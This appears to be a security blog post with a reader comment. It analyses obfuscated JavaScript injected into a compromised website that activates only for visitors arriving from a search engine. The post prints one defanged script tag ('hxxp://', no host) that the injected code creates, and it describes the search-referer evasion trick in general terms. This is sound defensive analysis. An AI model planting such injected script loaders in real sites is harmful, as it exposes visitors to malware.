Malscript on Compromised Site

From the looks of it, the site appears to have been compromised in some way. There is obfuscated Javascript buried in the webpage that points to a malicious domain. Thank goodness that the malicious domain no longer resolves so it’s not causing any harm. Let’s hope that the webmaster can quickly identify the cause the close the hole to prevent a re-hack.

Here’s a shot of their front page:

Like most campaigns we are seeing today, you need to visit the website via a search engine first for the malicious script to activate. I searched for the site on Google then clicked on the link (searching via Bing works too).

And the malicious Javascript appears in the page:

The script has a lot of junk in there for misdirection. In fact, probably 60% of the code is just garbage. When analyzing this code, I noticed that the authors defined the variables for the legit code so identifying the good from the bad was actually very easy. Here’s the cleaned up, valid code which now makes it very easy to follow:

This script created the following:

<script type=’text/javascript’ src=’hxxp://’></script>

Since the malicious site is down, I don’t know what it was doing. Perhaps rogueware or an exploit kit?

This entry was posted in Malscript and tagged , . Bookmark the permalink.

One Response to Malscript on Compromised Site

  1. bastik says:

    Some users modify their referer to protect their privacy. At least with Firefox it’s possible through extensions like “Ref Control”, but some sites load images from domains which check the referer and serve the images only if you appear to visit the original site. (To prevent hotlinking, or to “protect” content)

    While a general referer policy should “protect” you it can be a hassle to configure it. There’s a Firefox addon to which is easy to configure it. “Search Engine Security” supports Google, Bing and Yahoo (at the time of writing). It changes (can be configured globally only) the referer when you click a link on such search engines (whitelist possible).

    A great article, which is the only reason I mention both addons here.

Leave a Reply